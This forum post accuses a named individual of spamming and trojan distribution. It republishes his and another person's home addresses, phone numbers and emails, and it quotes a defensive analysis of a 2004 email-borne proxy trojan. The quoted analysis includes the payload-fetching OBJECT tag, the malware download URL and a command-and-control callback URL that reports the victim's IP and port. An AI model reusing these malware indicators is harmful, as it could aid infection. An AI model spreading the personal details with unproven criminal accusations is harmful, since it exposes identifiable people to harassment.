dominique
Dormant account
I am not quite sure if this thread belongs here. I am sure it can be moved.
This guy is a big time spammer.
Someone at a webmaster board exposed him and he read it.
Next thing he bombs the person who complained with bounced spam - tons
of it. He used their address as the sender and sent out his spam and
they got all the bounces.
Now here is some more info on this person, and it makes your hair
stand on end. I am likely going to be targeted for publishing this,
but I will not have someone like that intimidate everyone.
He is also linked to deploying trojans.
I hope someone will tell him to cut it out. If you speak up against
him he goes after you. I don't think someone like that should be
allowed to intimidate an entire section of the industry!
This guy is a big time spammer.
Someone at a webmaster board exposed him and he read it.
Next thing he bombs the person who complained with bounced spam - tons
of it. He used their address as the sender and sent out his spam and
they got all the bounces.
Now here is some more info on this person, and it makes your hair
stand on end. I am likely going to be targeted for publishing this,
but I will not have someone like that intimidate everyone.
He is also linked to deploying trojans.
Jeroen Puttemans
+32.23057068
Platanenlaan 15Perk, BRABANT 1820
BELGIUM
And if in any doubt have a look at this project on Scriptlance for a
mailer with proxy support (we all know what they are used for don't
we?):
You do not have permission to view link Log in or register now.
That or something like it is what he uses.
He apparently owns this:
Address: Platanenlaan 15, 1820, Perk Belgium Europe
Office: +32 477 99-4283
Fax:
Email: support@casinowebmarketing.com
ICQ: 123226511
Type: Trojan (lures you to a website to be infected by a trojan)
Domain(s)/IP Address(es) used: hotwincasino.com (WHOIS) (DNS)
Exact Link: http://www.hotwincasino.com/page.php
Email's Originating Network(s): Sjrb.ca (Canadian Network)
Danger Level: Medium
Description
Yes another spammed out trojan but this time some what different to
the most recent ones, mostly in that it does not appear to be a
keylogger at alll. We received an email early this morning with the
subject of:
YOU WON A FREE VACATION
The email also appeared to have no body. It was simply an empty email
that scrolled for a fair way. Being suspicous of this we had a peek at
the source of the email. We were not to terribly surprised to find
that even though the email displayed nothing in the body there was a
line, right down the bottom that read:
object data="xhttp://www.hotwincasino.com/page.php" width="14" height
="14"
A we've mentioned many times before, the OBJECT tag is a method of
embedding other content into a HTML page. In this case it fetches and
tries to open:
xhttp://www.hotwincasino.com/page.php
We fetched a copy of this page to investigate further. Again we were
not surprised to find the page was a HTA (HTML Application) which is
basically a very powerful way of allowing web pages interact with
Windows systems. At present we don't have a full idea of how this one
works. We know that it calls the file:
xhttp://www.hotwincasino.com/mstasks.exe
In order to do something with it but this time the spammers have been
clever and used an ecoding function of VBScript to make the code
unreadable to humans. Being non-programmers ourselves we are unsure
how to go about decoding this script. If there are any VBScript people
out there who would like to give the code a look over (remember it is
viral so be careful) there is a copy in the zipe file below.
We downloaded the mstasks.exe file from the site (not to be confused
with the Windows file mstask.exe) and ran strings across it in order
to extract any plain text that might give us some clues. This first
pass was not very succesful and we only ended up with some information
that confirmed that it appeared to hook into various components of
Windows networking.
In order to find out more, we once again set up our VMware (virtual
machine) with a victim Windows 2000 operating system. Internal
monitoring was set up using the free utilies from Sysinternals who
make some very good tools, highly recommended for forensics work on
Windows machines. External network monitoring was set up on our Linux
gateway.
Once this was set up we loaded up the page the email used and sat back
to watch what happened. Well the good news is that the intial
infection phase doesn't appear to work to well. Our Windows 2000 set
up is totally unpatched but Internet Explorer did actually ask us if
we wanted to save or execute the code being sucked down. This should
tip most people off to something being wrong and cancelling the
transaction. However since we don't have other systems to test,
perhaps other versions of Windows do execute the code without asking.
Either way, once the code is executed a small blank window pops up.
Nothing inside it. However in the background there is some serious
work happening. From what we can tell the contents of mstasks.exe are
downloaded and then executed on the machine. This creates a number of
files. We found that in the C:\ directory there were two new
executable files:
y.exe
x.exe
We also found the in the C:\WINNT\system32\ directory there was a file
called:
scchost.exe
Notice again how the spammers have tried to make the file name similar
to a real Windows file in the same directory (svchost.exe). We found
that this file was now also running as a full time process in the
background. After about 30 seconds another executable was created in
the same directory this time called:
scchostc.exe
This was also started as a full time process (as a child of scchost.
exe) and began to listen on a port. Later on we found that this port
was choosen at random each time the trojan started up. For example
some of the ports we saw being used:
40627
12052
36890
After this point the trojan appeared to simply sit there and await
instructions. After probing the open port for a bit we came to the
conclusion that it was a proxy server. At around this time we also
noticed some network traffic from the machine. First there was a call
from the machine to the site:
http://www.ip2location.com/map.asp
Which is a legitimate web site that simply reports back where your
request is coming from and if you are behind a proxy server. This is
used by the trojan to obtain the machines real IP address for the next
phase.
The next phase is then to send a request that says:
xhttp://216.52.184.239/command.php?IP=<victim's IP address>&Port=<port
number proxy is listening on>
Once this is done the remote server starts sending back a steady
stream of what look like web site fetch requests. However since we're
not super savy with these we are unable to tell completly.
Basically what we have here is a clever little proxy trojan that the
spammers could easily use for a number of things. Making anonymous web
requests, sending out spam, attacking other machines on the internet
and the fact it reports back to base to keep the spammers up to date
is quite handy for them as they don't have to bother probing to see
which machines are infected.
Having watched the infection in action we then decided to turn our
attention back to the executable files. After some more probing we
found that several of the files had been packed with UPX and that was
why we were getting very little information out of them. We ran the
UPX unpacker across the following files:
mstasks.exe
scchostc.exe
y.exe
The other files we found not be packed with UPX. Once all the files
were unpacked we ran strings across them and came out with some
interesting results:
mstasks.exe - The intial infection file. Creates scchost.exe and
scchostc.exe. Also adds registery entries to ensure trojan starts at
boot time. Also seems to contain the packed components of the other
files
x.exe - Seems to be a left over from the trojan install. Seems to just
download mstasks.exe and save it to y.exe
y.exe - A duplicate of mstasks.exe
scchost.exe - Trojan start up file. Sets up trojan environment,
intialses scchostc.exe and finds out victim machines IP address using
the above stated method.
scchostc.exe - The proxy part of the trojan. Turns out to be a copy of
a legitimate proxy software known as 3Proxy. It appears trojan writers
have used this before as many anti-virus scanners detect it as
Backdoor.Daemonize
It is important to note this is not a worm or a virus. It is not self
propating. That was purposefully sent out by the spammers, as a bulk
email in order to get people infected with this trojan.
Now we knew what the trojan did, we turned back to where the trojan
came from. We had a look at the top level for the site and found that
it was nothing more than an empty place holder. We also found the
files are being hosted on Yahoo! servers. We will contact Yahoo!
shortly and inform them of this breach of the AUP and hopefully get
the viral files quickly pulled down. We also found that where the
trojan is reporting back to appears to be linked with this domain:
playthehouse.com - (WHOIS) (DNS)
This link is strengthend, for when we check the apparenet registrants
for both domains we find the same person:
Jeroen Puttemans
It appears that the he is heavily involved with online casino's and
given what we are seeing today is not above stopping to using trojaned
machines to do some dirty work for him.
Extra Information
Copy of the email - Due to the fact that Interent Explorer has a habit
of trying to execute HTML code even when a file is marked as plain
text, we will not be placing a copy of the email here until the sites
are confirmed to have been taken down. A copy of the email will be in
the zip file
Strings of mstasks.exe - Before unpacking
Strings of mstasks.exe - After unpacking
Strings of x.exe - No unpacking needed
Strings of y.exe - Before unpacking
Strings of y.exe - After unpacking
Strings of scchost.exe - No unpacking needed
Strings of scchostc.exe - Before unpacking
Strings of scchostc.exe - After unpacking
Screen shot of Internet Explorer prompting to execute or download the
trojan
Screen shot of the window that pops up in the user chooses to execute
it
Screen shot showing scchost.exe running in the background
Screen shot showing the prescence of x.exe and y.exe
Screen shot showing scchostc.exe being started as a child of scchost.
exe
Screen shot showing scchostc.exe listening on a random port - In this
case port 12052
WARNING
Some of the files contained in the following zip file are viral in
nature. As such we only recommend those who know what they are doing
download the file. Code Fish Spam Watch will not take responsibility
if this warning is ignored and your machine is infected.
Copy of trojan site and other details - Contained within a passworded
zip file. Password "trojan" but without quotes.
Log of further activity
7:15 9/3/04 - Domain still fully active. Going to try and find another
way to contact Yahoo!
And more:
Outdated URL (Invalid)
And he sells credit card info:
You do not have permission to view link Log in or register now.
Link Removed (Old/Invalid)
And it gets worse....what a lowlife scumbag!
You do not have permission to view link Log in or register now.
WARNING
If you have been sent to this website by a person calling himself
'godmailer', or using the following contact details, you are being
ripped off. The product functionality that he describes is inaccurate
and not included in our releases.
Jeroen Puttemans (webmaster@turnkeycasino.net)
+32.23057068
Platanenlaan 15
Perk, Brabant 1820
BE
Martin Puttemans (webmaster@turnkeycasino.net)
+32.477994283
Vinkreed 4
Osmod, BRABANT 1820
BE
ICQ: 123226511
He is offering to sell our product for between $300 and $500 USD. We
have determined that he has obtained an early version of our product
(REL-0.6) which is severely outdated and functionally incomplete. We
have complete logs of his intrustion attempts over the past 2 months
and authorities have been contacted.
We have removed all product information and documentation in the
interim.
If you have already purchased a copy of our software from the above
mentioned person please contact us at sales@cleanmailer.com, all
information will be treated in the strictest of confidence.
I hope someone will tell him to cut it out. If you speak up against
him he goes after you. I don't think someone like that should be
allowed to intimidate an entire section of the industry!
Last edited by a moderator: